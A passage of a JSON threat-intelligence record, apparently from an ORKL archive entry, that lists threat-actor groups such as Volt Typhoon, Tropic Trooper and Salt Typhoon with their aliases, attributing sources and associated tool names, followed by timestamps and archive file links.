			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a88747e2-ffed-45d8-b847-8464361b2254",
			"created_at": "2023-11-01T02:01:06.605663Z",
			"updated_at": "2026-04-10T02:00:05.289908Z",
			"deleted_at": null,
			"main_name": "Volt Typhoon",
			"aliases": [
				"Volt Typhoon",
				"BRONZE SILHOUETTE",
				"Vanguard Panda",
				"DEV-0391",
				"UNC3236",
				"Voltzite",
				"Insidious Taurus"
			],
			"source_name": "MITRE:Volt Typhoon",
			"tools": [
				"netsh",
				"PsExec",
				"ipconfig",
				"Wevtutil",
				"VersaMem",
				"Tasklist",
				"Mimikatz",
				"Impacket",
				"Systeminfo",
				"netstat",
				"Nltest",
				"certutil",
				"FRP",
				"cmd"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7cf4ec85-806f-4fd7-855a-6669ed381bf5",
			"created_at": "2023-11-08T02:00:07.176033Z",
			"updated_at": "2026-04-10T02:00:03.435082Z",
			"deleted_at": null,
			"main_name": "Dalbit",
			"aliases": [],
			"source_name": "MISPGALAXY:Dalbit",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "49b3063e-a96c-4a43-b28b-1c380ae6a64b",
			"created_at": "2025-08-07T02:03:24.661509Z",
			"updated_at": "2026-04-10T02:00:03.644548Z",
			"deleted_at": null,
			"main_name": "BRONZE SILHOUETTE",
			"aliases": [
				"Dev-0391 ",
				"Insidious Taurus ",
				"UNC3236 ",
				"Vanguard Panda ",
				"Volt Typhoon ",
				"Voltzite "
			],
			"source_name": "Secureworks:BRONZE SILHOUETTE",
			"tools": [
				"Living-off-the-land binaries",
				"Web shells"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "578f8e62-2bb4-4ce4-a8b7-6c868fa29724",
			"created_at": "2022-10-25T16:07:24.344358Z",
			"updated_at": "2026-04-10T02:00:04.947834Z",
			"deleted_at": null,
			"main_name": "Tropic Trooper",
			"aliases": [
				"APT 23",
				"Bronze Hobart",
				"Earth Centaur",
				"G0081",
				"KeyBoy",
				"Operation Tropic Trooper",
				"Pirate Panda",
				"Tropic Trooper"
			],
			"source_name": "ETDA:Tropic Trooper",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"ByPassGodzilla",
				"CHINACHOPPER",
				"CREDRIVER",
				"China Chopper",
				"Chymine",
				"Darkmoon",
				"Gen:Trojan.Heur.PT",
				"KeyBoy",
				"Neo-reGeorg",
				"PCShare",
				"POISONPLUG.SHADOW",
				"Poison Ivy",
				"RoyalRoad",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Swor",
				"TSSL",
				"USBferry",
				"W32/Seeav",
				"Winsloader",
				"XShellGhost",
				"Yahoyah",
				"fscan",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "86182dd7-646c-49c5-91a6-4b62fd2119a7",
			"created_at": "2025-08-07T02:03:24.617638Z",
			"updated_at": "2026-04-10T02:00:03.738499Z",
			"deleted_at": null,
			"main_name": "BRONZE HOBART",
			"aliases": [
				"APT23",
				"Earth Centaur ",
				"KeyBoy ",
				"Pirate Panda ",
				"Red Orthrus ",
				"TA413 ",
				"Tropic Trooper "
			],
			"source_name": "Secureworks:BRONZE HOBART",
			"tools": [
				"Crowdoor",
				"DSNGInstaller",
				"KeyBoy",
				"LOWZERO",
				"Mofu",
				"Pfine",
				"Sepulcher",
				"Xiangoop Loader",
				"Yahaoyah"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7074cc97-be8f-417b-8294-124c3add8668",
			"created_at": "2025-05-29T02:00:03.190761Z",
			"updated_at": "2026-04-10T02:00:03.84828Z",
			"deleted_at": null,
			"main_name": "UAT-5918",
			"aliases": [],
			"source_name": "MISPGALAXY:UAT-5918",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "ea4726a4-3b7c-45db-a579-2abd4986941c",
			"created_at": "2025-11-01T02:04:53.002048Z",
			"updated_at": "2026-04-10T02:00:03.764362Z",
			"deleted_at": null,
			"main_name": "BRONZE FLAXEN",
			"aliases": [
				"Ethereal Panda ",
				"Flax Typhoon "
			],
			"source_name": "Secureworks:BRONZE FLAXEN",
			"tools": [
				"Bad Potato",
				"Juicy Potato",
				"Metasploit",
				"Mimikatz",
				"SoftEther VPN"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6477a057-a76b-4b60-9135-b21ee075ca40",
			"created_at": "2025-11-01T02:04:53.060656Z",
			"updated_at": "2026-04-10T02:00:03.845594Z",
			"deleted_at": null,
			"main_name": "BRONZE TIGER",
			"aliases": [
				"Earth Estries ",
				"Famous Sparrow ",
				"Ghost Emperor ",
				"RedMike ",
				"Salt Typhoon "
			],
			"source_name": "Secureworks:BRONZE TIGER",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "4ed2b20c-7523-4852-833b-cebee8029f55",
			"created_at": "2023-05-26T02:02:03.524749Z",
			"updated_at": "2026-04-10T02:00:03.366175Z",
			"deleted_at": null,
			"main_name": "Volt Typhoon",
			"aliases": [
				"BRONZE SILHOUETTE",
				"VANGUARD PANDA",
				"UNC3236",
				"Insidious Taurus",
				"VOLTZITE",
				"Dev-0391",
				"Storm-0391"
			],
			"source_name": "MISPGALAXY:Volt Typhoon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434590,
	"ts_updated_at": 1775792084,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/24f745594ec13d4635c14e424343c37df2ad3dcf.pdf",
		"text": "https://archive.orkl.eu/24f745594ec13d4635c14e424343c37df2ad3dcf.txt",
		"img": "https://archive.orkl.eu/24f745594ec13d4635c14e424343c37df2ad3dcf.jpg"
	}
}